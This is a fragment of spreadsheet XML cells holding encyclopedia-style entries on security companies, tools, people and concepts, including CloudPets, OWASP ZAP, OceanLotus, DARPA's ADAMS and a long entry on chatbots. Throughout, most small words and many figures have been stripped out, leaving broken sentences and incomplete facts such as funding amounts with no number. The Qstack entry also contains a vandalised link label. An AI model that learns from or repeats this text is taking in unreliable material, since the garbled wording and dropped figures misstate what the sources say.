york office chief medical examiner pandemic influenza surge plan manage in-hospital deaths planning tool city york office chief medical examiner u.s. department health human services pandemic influenza plan report july review committee (london assembly)nihilent (formerly known icra sapphire) www.nihilent.com playing role uvis implementation various agencies.</t>
  </si>
  <si>
    <t>Unified access management</t>
  </si>
  <si>
    <t>unified access management (uam) refers identity management solution. used enterprises manage digital identities provide secure access users across multiple devices applications, cloud on-premise. unified access management solutions provide single platform manage access across diverse users, devices, applications, whether on-premise cloud.unified access management (uam) evolution identity access management (iam) systems. goal unified access management similar identity access management: manage identities individual entities (people, devices, authentication authorization (roles privileges) within across enterprise systems secure manner bolsters productivity. identity access management traditional identity access management tools work well addressing specific portions enterprise (specific environments, on-premises cloud; specific users, employees external partners) own. however, many businesses must harness multiple solutions. example, microsoft active directory access management tool manage access on-premise applications, require identity-as-a-service (idaas) solutions manage access cloud software service (saas) apps. managing multiple identities access management systems burden information technology (it) departments. adds cost requiring maintenance multiple solutions often requires users provisioned de-provisioned multiple systems. this given system manage access specific devices specific systems.with fragmented identity management, enterprise able provide true single sign multi-factor authentication, effective user lifecycle management, slowing digital transformation. this significant, financial impact. forrester found $4.47 million annual loss productivity poor access management every 10,000 employees. hybrid environments complicate access management, many organizations able dispense on-premises systems. example, 2018 decision makers surveyed reported majority organization’s custom applications still on-premises.the extensive cost moving legacy systems means organizations likely remain hybrid time. history introduced onelogin. unified access management versus identity access management differs providing umbrella solution. central, cloud directory single source truth identities access. cloud directory integrates on-premise identity providers cloud identity providers. requests information identity providers updates them, user lifecycle management work place (the cloud directory) update appropriate identity providers. provides functionality needed secure access across users devices. typically, includes: single sign-on multi-factor authentication advanced adaptive authentication provisioning de-provisioning users role-based access control flexible security policies enforcement portal supports broad range cloud applications, typically using protocols security assertion markup language (saml) tools integrate on-premises software unified access management system support laptops desktops provide single sign-on access logging machine full mobile support rich reporting intelligence access events references</t>
  </si>
  <si>
    <t>Cloudbric Labs</t>
  </si>
  <si>
    <t>cloudbric labs collection free security resources tools, provided cloud-based security provider cloudbric. it’s designed developers, webmasters, users interested achieving maintaining basic website security. components cloudbric labs composed blackipedia: comprehensive malicious “black”) addresses, updated every hours real data generated attacks detected cloudbric’s (web application firewall) threat index: analyzed reports recent web-related vulnerabilities wafer: evaluator tests detection capabilities (performance) widely-used wafsan offered allow users integrate information cloudbric labs security platforms. awards gold award cybersecurity project year (asia-pacific) 2018 cybersecurity excellence awards. references external links https://web.archive.org/web/20180424075416/https://labs.cloudbric.com/ cloudbric labs homepage. retrieved 2018-03-22.</t>
  </si>
  <si>
    <t>Arjen Kamphuis</t>
  </si>
  <si>
    <t>arjen kamphuis (groningen, january 1972 missing since august 2018, last seen bodø, norway) cybersecurity expert hacktivist. addressed topics like open standards free software, safe elections it-aware it-capable government, eventually protect free speech democracy. ever since edward snowden leaked highly classified information national security agency (nsa) 2013, especially dedicated protecting investigative journalists. wrote book ‘information security investigative journalists’ co-author silkie carlo, director brother watch. career kamphuis co-founder chief technology officer gendo. kamphuis studied natural sciences utrecht university worked twynstra gudde architect, trainer strategy advisor. certified auditor information security specialist. since 2006 helped secure information systems corporates, national government ngo's. work ranges regular privacy-compliance security-awareness countering espionage companies, journalists governments. keep technically involved global hacker-scene. kept touch (former)employees agencies professionals work front critical infrastructure protection. worked strategic impact technological developments social, economic geo-political impact science technology.in 2016 kamphuis started working brunel amsterdam lead advisor information security worked closely william (bill) binney kirk wiebe. august 2017, invited bill binney press conference austria, together schrems thomas lohninger talk mass surveillance austria. late 2017 started brunel daughter company pretty good knowledge technical director. bill binney kirk wiebe co-founders contribute directors analytics.kamphuis involved formulating public policy areas open standards open source government public sector. advised senior managers administrators companies public institutions, members parliament several european countries dutch cabinet opportunities offered open standards open source software european knowledge economy society whole. expert team plasterk advised (not) using e-voting elections. personal life kamphuis relationship annie machon, former intelligence officer whistleblower, 2007 2014, living düsseldorf berlin. 2016 settled amsterdam. much sought-after international speaker technology policy issues. wrote insights ideas huffington post. disappearance norwegian police conclude kamphuis probably drowned kayaking incident fjord near rognan, norway. body found. after disappearance, friends kamphuis compiled book selection articles prof. b.p.f. (bart) jacobs, professor interdisciplinary security, privacy data governance radboud university nijmegen netherlands wrote introduction arjen kamphuis public cause digital world. bibliography kamphuis, (2020). infosecurity (gran knows why). gendo; isbn 9789090328218 also list people disappeared references</t>
  </si>
  <si>
    <t>CloudWalk Technology</t>
  </si>
  <si>
    <t>cloudwalk technology ltd. chinese developer facial recognition software.the company sanctioned united states government allegedly participating major human rights abuses uyghurs. history cloudwalk founded zhou graduate university science technology china academic background artificial intelligence pattern recognition. cloudwalk founded april 2015, following zhou's departure chinese academy sciences.in 2017, cloudwalk raised $379 million series funding investors including shunwei capital, oriza holdings, puhua capital. role mass surveillance uyghurs 2020, united states department commerce added cloudwalk technology entity list role aiding chinese government mass surveillance uyghur population. cloudwalk technology partnered university illinois urbana–champaign develop surveillance technology. according officials, cloudwalk technology was, "complicit human rights violations abuses committed china’s campaign repression, mass arbitrary detention, forced labor high-technology surveillance uighurs, ethnic kazakhs, members muslim minority groups xinjiang uighur autonomous region (xuar)". december 2021, united states department treasury prohibited u.s. investment cloudwalk technology, accusing company complicity aiding uyghur genocide. customers cloudwalk primary supplier facial recognition technology bank china haitong securities.in 2018, cloudwalk signed deal provide government zimbabwe mass facial recognition system, monitor major transportation hubs, well create national facial database. references</t>
  </si>
  <si>
    <t>CloudPets</t>
  </si>
  <si>
    <t>cloudpets internet-connected soft manufactured spiral toys subject numerous security vulnerabilities february 2017. plush teddy bear-style toys bluetooth connect parent's smartphone allow distant family members send voice messages toy, allow children send voice messages back.security researchers demonstrated insecure could trivially accessed bluetooth. personal records 820,000 owners stored insecure mongodb database. attackers also replaced database ransom demand pointing bitcoin address. data retrieved cloudpets database sent australian security researcher troy hunt included have been pwned?, database users whose data compromised. database user records also contained links pointing million audio files hosted amazon services containing voice messages sent toys. hunt stated database hack "ridiculously easy".following disclosure security vulnerabilities, cloudpets started enforcing stronger password requirements users service—they previously enforced password complexity requirements documentation suggested short, weak passwords. numerous journalists security researchers including hunt noted company non-responsive disclosures security researchers enquiries journalists. also computer security internet things friend cayla, another internet-connected children's references</t>
  </si>
  <si>
    <t>CloudPassage</t>
  </si>
  <si>
    <t>cloudpassage company provides automation platform, delivered software service, improves security private, public, hybrid cloud computing environments. cloudpassage headquartered francisco. history cloudpassage founded carson sweet, talli somekh, vitaliy geraymovych 2010. company used cloud computing data analytics implement security monitoring control platform called halo. cloudpassage spent year stealth developing halo technology, coming stealth mode closed beta january 2011. june 2012, company launched commercial product included configuration security monitoring, network microsegmentation, two-factor authentication privileged access management. 2013, cloudpassage expanded halo support large enterprises advanced security compliance requirements product called halo enterprise.the first round venture funding company raised $6.5 million. april 2012, cloudpassage raised million. financing round tenaya capital. february 2014, cloudpassage announced raised $25.5 million funding shasta ventures. total, company invested million technology raised approximately million capital. product cloudpassage platform provides cloud workload security compliance systems hosted public private cloud infrastructure environments, including hybrid cloud multi-cloud workload hosting models. flagship product company offers called halo. halo secures virtual servers public, private, hybrid cloud infrastructures provides file integrity monitoring (fim) also administering firewall automation, vulnerability monitoring, network access control, security event alerting, assessment. halo platform also provides security applications privileged access management, software vulnerability scanning, multifactor authentication, log-based ids.in december 2013, cloudpassage servers microsoft windows linux operating systems combinations popular programs invited hackers attempt hack servers. prize $5,000 winning hacker novice completed task four hours. cloudpassage programmed servers basic default security settings show vulnerable cloud computing programs security threats. awards recognition 2011, gigaom named cloudpassage list cloud innovators. that month, eweek recognized cloudpassage startup companies flying under radar.sc magazine named cloudpassage industry innovator virtualization cloud security category 2012. also 2012, wall street journal named cloudpassage runner information security category technology innovation awards.the cloudpassage large-scale security program, halo, best security solution 2014 siia codie awards. references</t>
  </si>
  <si>
    <t>Unified threat management</t>
  </si>
  <si>
    <t>unified threat management (utm) approach information security single hardware software installation provides multiple security functions. this contrasts traditional method point solutions security function. simplifies information-security management providing single management reporting point security administrator rather managing multiple products different vendors. appliances gaining popularity since 2009, partly all-in-one approach simplifies installation, configuration maintenance. such setup saves time, money people compared management multiple security systems. instead several single-function appliances, needing individual familiarity, attention support, network administrators centrally administer security defenses computer. some prominent brands cisco, fortinet, sophos, netgear, fortigate, huawei, wijungle, sonicwall check point. utms typically called next-generation firewalls. features utms minimum converged security features like network firewall intrusion detection service (ids) intrusion prevention service (ips)some features commonly found utms are: gateway anti-virus application layer (layer firewall control deep packet inspection proxy content filtering email filtering spam phishing attacks data loss prevention (dlp) security information event management (siem) virtual private network (vpn) network access control network tarpit additional security services denial services (dos), distributed denial service (ddos), zero day, spyware protection disadvantages although offers ease management single device, also introduces single point failure within infrastructure. additionally, approach basic information assurance security approaches defense depth, would replace multiple security products, compromise layer break entire defense-in-depth approach. references</t>
  </si>
  <si>
    <t>CloudMask</t>
  </si>
  <si>
    <t>cloudmask data privacy company public private cloud applications. history launched 2013, wael aggan, co-founder cloudmask tarek el-gillani, co-founder cloudmask, information privacy company based ottawa, canada. prior cloudmask, started viasafe trademerit, later acquired. 2015, cloudmask engine received common criteria certification, data protection services.since, cloudmask partnered allstream clio, helping secure customers' data. overview cloudmask patent technology masks production data real-time. running devices, transparently intercepts changes production data unauthorized data requesters access sensitive data, physical changes original production data take place.by protecting data theft, masking acts compliance solution organizations subject data privacy regulations hipaa, gdpr, pci. unauthorized users breach perimeter security masked data data privacy upheld. products secure communication gmail outlook. confidential storage file sharing google drive box. confidential practice management clio. secure case management salesforce. custom configuration, embedding protection layer business applications. references</t>
  </si>
  <si>
    <t>Artisan's Asylum</t>
  </si>
  <si>
    <t>artisan's asylum non-profit community workshop somerville, massachusetts. artisan's asylum founded 2010 engineer, artist, friends needed affordable place build make things. asylum first makerspace incorporate u.s. 2012 today 40,000 square feet fabrication wonderland. once believed largest makerspace world, asylum remains among largest, home members, studios, workshops. shops include woodworking, welding, bicycle maintenance repair, machining, electronics robotics, jewelry, digital fabrication, digital photo studio, fiber arts, casting, laser cutting, machines, prop shop, design lab. asylum hosts 30-40 public classes month, providing hands-on tool training skills building courses. 2013, asylum housed small manufacturing companies, raised number manufacturing firms somerville 50%. asylum credited attracting greentech incubator greentown labs somerville contributing substantially value creative economy somerville.in 2017, artisan's asylum featured around hosting megabots inc. built meter tall robot fighter, eagleprime. october eagleprime defeated kuratas, battle robot build japanese company suidobashi. fight hosted abandoned steel mill japan, live streamed twitch. references external links official website</t>
  </si>
  <si>
    <t>Authenticated Key Exchange</t>
  </si>
  <si>
    <t>authenticated exchange (ake) authenticated agreement exchange session exchange protocol also authenticates identities parties involved exchange.transport layer security integral securing http connections perhaps widely deployed protocol. references</t>
  </si>
  <si>
    <t>PRODIGAL (computer system)</t>
  </si>
  <si>
    <t>prodigal (proactive discovery insider threats using graph analysis learning) computer system predicting anomalous behavior among humans, data mining network traffic emails, text messages server entries. part darpa's anomaly detection multiple scales (adams) project. initial schedule years budget million.it uses graph theory, machine learning, statistical anomaly detection, high-performance computing scan larger sets data quickly past systems. amount data analyzed range terabytes day. targets analysis employees within government defense contracting organizations; specific examples behavior system intended detect include actions nidal malik hasan wikileaks source chelsea manning. commercial applications include finance. results analysis, five serious threats day, agents, analysts, operators working counterintelligence. primary participants georgia institute technology college computing georgia tech research institute defense advanced research projects agency army research office science applications international corporation oregon state university university massachusetts amherst carnegie mellon university also cyber insider threat einstein (us-cert program) threat (computer) intrusion detection echelon, thinthread, trailblazer, turbulence (nsa programs) fusion center, investigative data warehouse (fbi) references</t>
  </si>
  <si>
    <t>OWASP ZAP</t>
  </si>
  <si>
    <t>owasp (short attack proxy) open-source application security scanner. intended used application security well professional penetration testers. active open application security project (owasp) projects given flagship status.when used proxy server allows user manipulate traffic passes including traffic using https. also daemon mode controlled rest api. added thoughtworks technology radar 2015 trial ring.zap originally forked paros, another pentesting proxy. simon bennetts, project lead, stated 2014 zap's source code still paros. features some built features include: intercepting proxy server, traditional ajax crawlers, automated scanner, passive scanner, forced browsing, fuzzer, websocket support, scripting languages, plug-n-hack support. plugin-based architecture online ‘marketplace’ allows updated features added. control panel easy use. awards owasp tools referred 2015 bossie award best open source networking security software second place security tools 2014 voted toolswatch.org readers security tool 2013 voted toolswatch.org readers toolsmith tool year 2011 also application security burp suite w3af fiddler (software) references external links official website</t>
  </si>
  <si>
    <t>Chartered IT Professional</t>
  </si>
  <si>
    <t>chartered professional full, chartered information technology professional) denoted citp professional qualification awarded royal charter professionals satisfy strict criteria british computer society (bcs), professional body united kingdom. status title chartered professional aligned skills framework information (sfia), government backed competency framework, citp benchmark excellence terminal (final/top most) qualification criteria requirements chartered status approved privy council citp designation chartered qualifications fields (such chartered accountant qualification awarded icaew). citp status gaining increasing national international recognition benchmark excellence professionals. provides evidence individual’s commitment profession endorsement experience knowledge. eligibility order qualify award person normally needs least years professional experience evidence experience senior level skills framework information (sfia), passed professional competency examination successfully completed skills assessment interview assessors.a fast track scheme exists holders certified architect certified specialist certifications open group, exempts applicants initial review interview elements application process.in order maintain certificate current competence, demonstrable must undertaken. designatory lettering chartered professionals entitled suffix citp names. this written honours, decorations university degrees letters denoting membership professional engineering institutions example: (hons) citp mbcs.the maintains online register members citp status. licensing other professional membership bodies apply licence enables award citp eligible members. ireland irish computer society awarding body citp status ireland. standard developed consultation applicants undergo assessment process. zealand institute professionals zealand licensed award citp status zealand. body extends citp standard citpnz, incorporating additional requirements mandatory practicing certificate retain designation. united kingdom institution engineering technology (iet) first membership body licensed award citp, agreement ended february 2020. references external links chartered professional chartered professional ireland irish computer society chartered professional zealand institute chartered professionals (south africa)</t>
  </si>
  <si>
    <t>Chatbot</t>
  </si>
  <si>
    <t>chatbot chatterbot software application used conduct on-line chat conversation text text-to-speech, lieu providing direct contact live human agent. chatbot type software help customers automating conversations interact messaging platforms. designed convincingly simulate human would behave conversational partner, chatbot systems typically require continuous tuning testing, many production remain unable adequately converse, none pass standard turing test. term "chatterbot" originally coined michael mauldin (creator first verbot) 1994 describe conversational programs.chatbots used dialog systems various purposes including customer service, request routing, information gathering. while chatbot applications extensive word-classification processes, natural-language processors, sophisticated others simply scan general keywords generate responses using common phrases obtained associated library database. most chatbots accessed on-line website popups virtual assistants. they classified usage categories include: commerce (e-commerce chat), education, entertainment, finance, health, news, productivity. background 1950, alan turing's famous article "computing machinery intelligence" published, proposed called turing test criterion intelligence. this criterion depends ability computer program impersonate human real-time written conversation human judge extent judge unable distinguish reliably—on basis conversational content alone—between program real human. notoriety turing's proposed test stimulated great interest joseph weizenbaum's program eliza, published 1966, seemed able fool users believing conversing real human. however weizenbaum claim eliza genuinely intelligent, introduction paper presented debunking exercise: [in] artificial intelligence machines made behave wondrous ways, often sufficient dazzle even experienced observer. particular program unmasked, inner workings explained magic crumbles away; stands revealed mere collection procedures observer says could written that". with thought, moves program question shelf marked "intelligent", reserved curios object paper cause re-evaluation program "explained". programs ever needed more. eliza's method operation (copied chatbot designers ever since) involves recognition clue words phrases input, output corresponding pre-prepared pre-programmed responses move conversation forward apparently meaningful (e.g. responding input contains word 'mother' 'tell more about your family'). thus illusion understanding generated, even though processing involved merely superficial. eliza showed illusion surprisingly easy generate human judges ready give benefit doubt conversational responses capable interpreted "intelligent". interface designers come appreciate humans' readiness interpret computer output genuinely conversational—even actually based rather simple pattern-matching—can exploited useful purposes. most people prefer engage programs human-like, gives chatbot-style techniques potentially useful role interactive systems need elicit information users, long information relatively straightforward falls predictable categories. thus, example, online help systems usefully employ chatbot techniques identify area help users require, potentially providing "friendlier" interface formal search menu system. this sort usage holds prospect moving chatbot technology weizenbaum's "shelf reserved curios" marked "genuinely useful computational methods". development among notable early chatbots eliza (1966) parry (1972). more recent notable programs include a.l.i.c.e., jabberwacky d.u.d.e (agence nationale recherche cnrs 2006). while eliza parry used exclusively simulate typed conversation, many chatbots include functional features, games searching abilities. 1984, book called policeman's beard half constructed published, allegedly written chatbot racter (though program released would capable so).one pertinent field research natural-language processing. usually, weak fields employ specialized software programming languages created specifically narrow function required. example, a.l.i.c.e. uses markup language called aiml, specific function conversational agent, since adopted various developers so-called, alicebots. nevertheless, a.l.i.c.e. still purely based pattern matching techniques without reasoning capabilities, technique eliza using back 1966. this strong would require sapience logical reasoning abilities. jabberwacky learns responses context based real-time user interactions, rather driven static database. some recent chatbots also combine real-time learning evolutionary algorithms optimize ability communicate based conversation held. still, currently general purpose conversational artificial intelligence, software developers focus practical aspect, information retrieval. chatbot competitions focus turing test specific goals. annual contests loebner prize chatterbox challenge (the latter offline since 2015, however, materials still found archives).dbpedia created chatbot gsoc 2017. communicate facebook messenger. application messaging apps many companies' chatbots messaging apps simply sms. they used customer service, sales marketing.in 2016, facebook messenger allowed developers place chatbots platform. there 30,000 bots created messenger first months, rising 100,000 september 2017.since september 2017, also part pilot program whatsapp. airlines aeroméxico announced participation testing; airlines previously launched customer services facebook messenger platform. bots usually appear user's contacts, sometimes participants group chat. many banks, insurers, media companies, e-commerce companies, airlines, hotel chains, retailers, health care providers, government entities restaurant chains used chatbots answer simple questions, increase customer engagement, promotion, offer additional ways order them.a 2017 study showed companies used chatbots. according 2016 study, businesses said intended 2020. part company apps websites previous generations chatbots present company websites, e.g. jenn alaska airlines debuted 2008 expedia's virtual customer service agent launched 2011. newer generation chatbots includes watson-powered "rocky", introduced february 2017 york city-based e-commerce company rare carat provide information prospective diamond buyers. chatbot sequences used marketers script sequences messages, similar autoresponder sequence. such sequences triggered user opt-in keywords within user interactions. after trigger occurs sequence messages delivered next anticipated user response. each user response used decision tree help chatbot navigate response sequences deliver correct response message. company internal platforms other companies explore ways chatbots internally, example customer support, human resources, even internet-of-things (iot) projects. overstock.com, one, reportedly launched chatbot named mila automate certain simple time-consuming processes requesting sick leave. other large companies lloyds banking group, royal bank scotland, renault citroën using automated online assistants instead call centres humans provide first point contact. saas chatbot business ecosystem steadily growing since conference facebook's mark zuckerberg unveiled messenger would allow chatbots app. large companies, like hospitals aviation organizations, architects designing reference architectures intelligent chatbots used unlock share knowledge experience organization efficiently, reduce errors answers expert service desks significantly. these intelligent chatbots make kinds artificial intelligence like image moderation natural-language understanding (nlu), natural-language generation (nlg), machine learning deep learning. customer service many high-tech banking organizations looking integrate automated ai-based solutions chatbots customer service order provide faster cheaper assistance clients becoming increasingly comfortable technology. particular, chatbots efficiently conduct dialogue, usually replacing communication tools email, phone, sms. banking, major application related quick customer service answering common requests, well transactional support. several studies report significant reduction cost customer services, expected lead billions dollars economic savings next years. 2019, gartner predicted 2021, customer service interactions globally handled completely study juniper research 2019 estimates retail sales resulting chatbot-based interactions reach $112 billion 2023.since 2016, facebook allowed businesses deliver automated customer support, e-commerce guidance, content, interactive experiences chatbots, large variety chatbots developed facebook messenger platform.in 2016, russia-based tochka bank launched world's first facebook range financial services, including possibility making payments.in july 2016, barclays africa also launched facebook chatbot, making first bank africa.the france's third-largest bank total assets société générale launched chatbot called sobot march 2018. while users sobot expressed satisfaction tested société générale deputy director bertrand cozzarolo stated never replace expertise provided human advisor. advantages using chatbots customer interactions banking include cost reduction, financial advice, 24/7 support. healthcare chatbots also appearing healthcare industry. study suggested physicians united states believed chatbots would beneficial scheduling doctor appointments, locating health clinics, providing medication information.whatsapp teamed world health organisation (who) make chatbot service answers users’ questions covid-19.in 2020, indian government launched chatbot called mygov corona helpdesk, worked whatsapp helped people access information coronavirus (covid-19) pandemic.certain patient groups still reluctant chatbots. mixed-methods study showed people still hesitant chatbots healthcare poor understanding technological complexity, lack empathy, concerns cyber-security. analysis showed heard health chatbot experience using perceived likely within months. majority participants would health chatbot seeking general health information (78%), booking medical appointment (78%), looking local health services (80%). however, health chatbot perceived less suitable seeking results medical tests seeking specialist advice sexual health. analysis attitudinal variables showed participants reported preference discussing health doctors (73%) access reliable accurate health information (93%). while curious technologies could improve health, reported seeking doctor experiencing health problem thought chatbot good idea. interestingly, reported dislike talking computers, felt would strange discuss health matters chatbot half unsure could trust advice given chatbot. therefore, perceived trustworthiness, individual attitudes towards bots, dislike talking computers main barriers health chatbots. politics zealand, chatbot short semantic analysis machine (made nick gerritsen touchtech) developed. designed share political thoughts, example topics climate change, healthcare education, etc. talks people facebook messenger.in india, state government launched chatbot aaple sarkar platform, provides conversational access information regarding public services managed. toys chatbots also incorporated devices primarily meant computing, toys.hello barbie internet-connected version doll uses chatbot provided company toytalk, previously used chatbot range smartphone-based characters children. these characters' behaviors constrained rules effect emulate particular character produce storyline.the friend cayla doll marketed line 18-inch dolls uses speech recognition technology conjunction android mobile recognize child's speech conversation. like hello barbie doll, attracted controversy vulnerabilities doll's bluetooth stack data collected child's speech. ibm's watson computer used basis chatbot-based educational toys companies cognitoys intended interact children educational purposes. malicious malicious chatbots frequently used fill chat rooms spam advertisements, mimicking human behavior conversations entice people revealing personal information, bank account numbers. they commonly found yahoo! messenger, windows live messenger, instant messenger instant messaging protocols. there also published report chatbot used fake personal dating service's website.tay, chatbot learns previous interaction, caused major controversy targeted internet trolls twitter. exploited, hours began send extremely offensive tweets users. this suggests although learned effectively experience, adequate protection place prevent misuse.if text-sending algorithm pass human instead chatbot, message would credible. therefore, human-seeming chatbots well-crafted online identities could start scattering fake news seems plausible, instance making false claims election. with enough chatbots, might even possible achieve artificial social proof. limitations chatbots creation implementation chatbots still developing area, heavily related artificial intelligence machine learning, provided solutions, possessing obvious advantages, important limitations terms functionalities cases. however, changing time. common limitations listed below: database, used output generation, fixed limited, chatbots fail dealing unsaved query. chatbot's efficiency highly depends language processing limited irregularities, accents mistakes. chatbots unable deal multiple questions time conversation opportunities limited. chatbots require large amount conversational data train. generative models, based deep learning algorithms generate responses word word based user input, usually trained large dataset natural-language phrases. chatbots difficulty managing non-linear conversations must back forth topic user. happens usually technology-led changes existing services, consumers, often older generations, uncomfortable chatbots limited understanding, making obvious requests dealt machines. chatbots jobs chatbots increasingly present businesses often used automate tasks require skill-based talents. with customer service taking place messaging apps well phone calls, growing numbers use-cases chatbot deployment gives organizations clear return investment. call center workers particularly risk ai-driven chatbots.chatbot jobs chatbot developers create, debug, maintain applications automate customer services communication processes. their duties include reviewing simplifying code needed. they also help companies implement bots operations. study forrester (june 2017) predicted jobs would impacted technologies 2019. also references bibliography computer history museum (2006), "internet history—1970's", exhibits, computer history museum, archived original 2008-02-21, retrieved 2008-03-05 güzeldere, güven; franchi, stefano (1995-07-24), "constructions mind", stanford humanities review, sehr, stanford university, (2), retrieved 2008-03-05 mauldin, michael (1994), "chatterbots, tinymuds, turing test: entering loebner prize competition", proceedings eleventh national conference artificial intelligence, aaai press, retrieved 2008-03-05 (abstract) network working group (1973), "rfc 439, parry encounters doctor", internet engineering task force, internet society, retrieved 2008-03-05 sondheim, alan (1997), &lt;nettime&gt; important documents early internet (1972), nettime.org, archived original 2008-06-13, retrieved 2008-03-05 turing, alan (1950), "computing machinery intelligence", mind, (236): 433–60, doi:10.1093/mind/lix.236.433 weizenbaum, joseph (january 1966), "eliza—a computer program study natural language communication between machine", communications acm, (1): 36–45, doi:10.1145/365153.365168, s2cid 1896290 further reading searle, john (1980), "minds, brains programs", behavioral brain sciences, (3): 417–457, doi:10.1017/s0140525x00005756, s2cid 55303721 shevat, amir (2017). designing bots: creating conversational experiences (first ed.). sebastopol, o'reilly media. isbn 978-1-4919-7482-7. oclc 962125282.</t>
  </si>
  <si>
    <t>Anomaly Detection at Multiple Scales</t>
  </si>
  <si>
    <t>anomaly detection multiple scales, adams, million darpa project designed identify patterns anomalies large data sets. darpa's information innovation office began 2011.the project intended detect prevent insider threats soldier good mental health becoming homicidal suicidal", "innocent insider becoming malicious", government employee [who] abuses access privileges share classified information". specific cases mentioned nidal malik hasan wikileaks source chelsea manning. commercial applications include finance. intended recipients system output operators counterintelligence agencies.the proactive discovery insider threats using graph analysis learning part adams project. georgia tech team includes noted high-performance computing researcher david bader. also cyber insider threat einstein (us-cert program) threat (computer) intrusion detection references</t>
  </si>
  <si>
    <t>VIPRE</t>
  </si>
  <si>
    <t>vipre security group, (also known vipre vipre security) brand ziff davis, privately held cybersecurity company headquartered york.vipre develops cybersecurity products focused endpoint email security along advanced threat intelligence applications. vipre based globally operations clearwater, florida, washington d.c., vancouver b.c., keele, united kingdom, dublin, ireland, copenhagen, denmark, stockholm, sweden, amsterdam, netherlands oslo, norway. corporate history company originally founded 1994 sunbelt software, acquired 2010 software.in 2013 sunbelt software spun renamed threattrack security.in 2017 concentrating vipre suite company uses name. vipre portfolio encompasses endpoint security, heritage original sunbelt software anti-virus products, email security, heritage company fusemail, comendo, staysecure, wecloud, icritical electricmail products previously acquired security awareness training acquisition inspired e-learning. later 2017, vipre earned recognition av-comparatives (one "top-rated products"), av-test virus bulletin.vipre featured world magazine article.in february 2018 acquired global.vipre acquires inspired elearning, november 11th 2021 https://www.dcadvisory.com/news-deals-insights/deal-announcements/dc-advisory-advised-inspired-elearning-on-its-sale-to-j2-global/#gref acquisitions products services references external links https://www.vipre.com/</t>
  </si>
  <si>
    <t>420chan</t>
  </si>
  <si>
    <t>420chan anonymous imageboard founded april 2005 freelance developer aubrey cottle. according founder, name portmanteau 420, slang word originating cannabis culture applicable drug culture generally, 4chan, another imageboard website. discussion site primarily focused around recreational drug wrestling, boards related topics including humor academia.while early history primarily known hosting board known /i/, used hacker collective anonymous stage "invasions" individuals platforms habbo hotel, turner.the modern incarnation website primarily known hosting discussions psychoactive drugs legal illegal. site also known lgbt discussion boards, /cd/ /sd/.as june 2022, 420chan's main url, 420chan.org, gone offline reactivated, rendering site inactive. footnotes notes references</t>
  </si>
  <si>
    <t>OceanLotus</t>
  </si>
  <si>
    <t>oceanlotus, also known apt32, hacker group associated government vietnam. accused cyberespionage targeting political dissidents, government officials, businesses ties vietnam. history 2020, bloomberg reported oceanlotus targeted china's ministry emergency management wuhan municipal government order obtain information covid-19 pandemic. vietnamese ministry foreign affairs called accusations unfounded.in 2020, kaspersky researchers disclosed oceanlotus using google play store distribute malware. november 2020 volexity researchers disclosed oceanlotus fake news websites facebook pages engage profiling distribute malware. according reports, facebook traced group's activities company called cyberone group minh city.in february 2021, amnesty international reported oceanlotus launched number spyware attacks vietnamese human rights activists, including thanh hieu.in march 2021, reported group's operations impacted fire data center france. references</t>
  </si>
  <si>
    <t>Oidentd</t>
  </si>
  <si>
    <t>oidentd 1413 compliant ident daemon runs linux, freebsd, openbsd, netbsd, dragonfly bsd, versions darwin solaris. handle masqueraded connections, flexible mechanism specifying ident responses. users granted permission specify ident responses, hide responses connections owned them, return random ident responses. responses specified according host port pairs. notable capabilities spoofed ident responses ident spoofing. oidentd.conf configuration file used specify amount control users responses oidentd returns upon successful lookups connections owned them, $home/.oidentd.conf file allows user specify ident response returned specific connections. also internet relay chat (software) references external links official website oidentd github oidentd open original author's website oidentd(8) linux administration privileged commands manual oidentd.conf(5) linux file formats manual</t>
  </si>
  <si>
    <t>Wibu-Systems</t>
  </si>
  <si>
    <t>wibu-systems gmbh software manufacturer founded 1989, specialising software licensing digital rights management. their flagship product codemeter, either dongle plugin controls licensing many software packages. references</t>
  </si>
  <si>
    <t>Check Point Integrity</t>
  </si>
  <si>
    <t>check point integrity endpoint security software product developed check point software technologies. designed protect personal computers networks connect computer worms, trojan horses, spyware, intrusion attempts hackers. software aims stop threats attacks signature updates installed software includes. network access controls detect remedy security policy violations allowed connect network; application controls block terminate malicious software programs transmit information unauthorized party; personal firewall; intrusion prevention system (ips) check point intrusion prevention system ips; spyware detection removal; instant messaging security tools.an administrator manages security policies apply groups users central console server. check point acquired integrity software part acquisition endpoint security start-up zone labs 2004. integrity software, released early 2002, derived zonealarm security technology added central policy management network access control functions. integrity integrated network gateways (the cisco 3000 series) ensure security requirements granted access network. demand endpoint security grew 2003 slammer blaster computer worms reportedly caused extensive damage, despite widespread antivirus software personal computers. number destructive worms followed, subsequent rise spyware significant problem, continued increase demand endpoint security products. data privacy integrity regulations required security audits mandated governmental professional authorities, along infections damage caused guest access, also prompted security software. competitors include symantec/sygate, cisco security agent, mcafee entercept, even point products like determina's memory firewall. external links check point software technologies website page check point integrity (aka check point endpoint security) infoworld review check point integrity techweb story check point integrity</t>
  </si>
  <si>
    <t>Qstack</t>
  </si>
  <si>
    <t>qstack [[cloud management made quackity |cloud management platform]] developed greenqloud, cloud computing software company founded reykjavik, iceland february 2010. qstack enables users manage multiple clouds hybrid deployments single self-service portal. qstack continuous development, incorporating developments within infrastructure, cloud, application management solutions. next release qstack slated june 2017. history 2014 jonsi stefansson joined ceo, greenqloud pivoted operational focus development qstack beta launch fall 2015, began offering support, technical services certifications software. features qstack hypervisor agnostic (kvm, vmware, hyper-v) manage private clouds multiple locations well aws, azure, ec2-compatible public clouds user interface. qstack combines proprietary software open-source components, company claims harden meet strict security standards often required enterprise deployments. qstack features templates windows, linux, operating systems. also features full ssh/rdp access instances, virtual routers, firewalls, load balancers built interface. reception 2015 review, columnist peter bruzzese praised qstack’s user interface ease-of-use clean look.[1] references</t>
  </si>
  <si>
    <t>Check Point</t>
  </si>
  <si>
